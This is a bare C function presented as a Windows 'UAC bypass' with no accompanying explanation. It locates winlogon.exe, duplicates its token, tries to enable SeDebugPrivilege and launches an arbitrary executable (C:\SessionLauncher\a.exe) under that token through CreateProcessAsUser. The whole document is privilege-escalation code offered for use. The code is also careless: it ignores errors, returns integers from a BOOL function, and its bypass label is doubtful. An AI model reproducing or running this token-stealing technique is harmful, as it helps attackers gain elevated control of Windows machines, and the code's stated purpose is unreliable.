ByPass UAC

BOOL PassUAC() 

{

   PROCESS_INFORMATION pi;

   STARTUPINFO si;

   BOOL bResult = FALSE;

   DWORD dwSessionId,winlogonPid;

   HANDLE hUserToken,hUserTokenDup,hPToken,hProcess;

   DWORD dwCreationFlags;

 

   //

   // Log the client on to the local computer.

   //

   dwSessionId = WTSGetActiveConsoleSessionId();

 

   //  

   // Find the winlogon process

   //

   PROCESSENTRY32 procEntry;

 

HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if (hSnap == INVALID_HANDLE_VALUE)

{

return 1 ;

}

procEntry.dwSize = sizeof(PROCESSENTRY32);

if (!Process32First(hSnap, &procEntry)){

return 1 ;

}

 

do

{

if (_stricmp(procEntry.szExeFile, "winlogon.exe") == 0)

{

//

// We found a winlogon process...make sure it's running in the console session

//

DWORD winlogonSessId = 0;

if (ProcessIdToSessionId(procEntry.th32ProcessID, &winlogonSessId) && winlogonSessId == dwSessionId){

winlogonPid = procEntry.th32ProcessID;

break;

}

}

 

} while (Process32Next(hSnap, &procEntry));

 

WTSQueryUserToken(dwSessionId,&hUserToken);

dwCreationFlags = NORMAL_PRIORITY_CLASS|CREATE_NEW_CONSOLE;

ZeroMemory(&si, sizeof(STARTUPINFO));

si.cb= sizeof(STARTUPINFO);

si.lpDesktop = "winsta0\\default";

ZeroMemory(&pi, sizeof(pi));

TOKEN_PRIVILEGES tp;

LUID luid;

hProcess = OpenProcess(MAXIMUM_ALLOWED,FALSE,winlogonPid);

 

if(!::OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY

|TOKEN_DUPLICATE|TOKEN_ASSIGN_PRIMARY|TOKEN_ADJUST_SESSIONID

|TOKEN_READ|TOKEN_WRITE,&hPToken))

{

  int abcd = GetLastError();

  printf("Process token open Error: %u\n",GetLastError()); 

}

 

if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid)){

  printf("Lookup Privilege value Error: %u\n",GetLastError());

}

 

tp.PrivilegeCount =1;

tp.Privileges[0].Luid =luid;

tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;

 

DuplicateTokenEx(hPToken,MAXIMUM_ALLOWED,NULL,SecurityIdentification,TokenPrimary,&hUserTokenDup);

int dup = GetLastError();

 

//

//Adjust Token privilege

//

SetTokenInformation(hUserTokenDup,TokenSessionId,(void*)dwSessionId,sizeof(DWORD));

 

if (!AdjustTokenPrivileges(hUserTokenDup,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,NULL)){

  int abc =GetLastError();

  printf("Adjust Privilege value Error: %u\n",GetLastError());

}

 

if (GetLastError()== ERROR_NOT_ALL_ASSIGNED)

{

printf("Token does not have the provilege\n");

}

 

LPVOID pEnv =NULL;

 

if(CreateEnvironmentBlock(&pEnv,hUserTokenDup,TRUE))

{

  dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT;

}

else

 pEnv=NULL;

 

//

// Launch the process in the client's logon session.

//

bResult = CreateProcessAsUser(

 hUserTokenDup,            // client's access token

 _T("C:\\SessionLauncher\\a.exe"),              // file to execute

 NULL,// command line

 NULL,// pointer to process SECURITY_ATTRIBUTES

 NULL,// pointer to thread SECURITY_ATTRIBUTES

 FALSE,// handles are not inheritable

 dwCreationFlags,// creation flags

 pEnv,// pointer to new environment block 

 NULL,// name of current directory 

 &si,// pointer to STARTUPINFO structure

 &pi// receives information about new process

);

 

int iResultOfCreateProcessAsUser = GetLastError();

 

CloseHandle(hProcess);

CloseHandle(hUserToken);

CloseHandle(hUserTokenDup);

CloseHandle(hPToken);

 

return 0;

}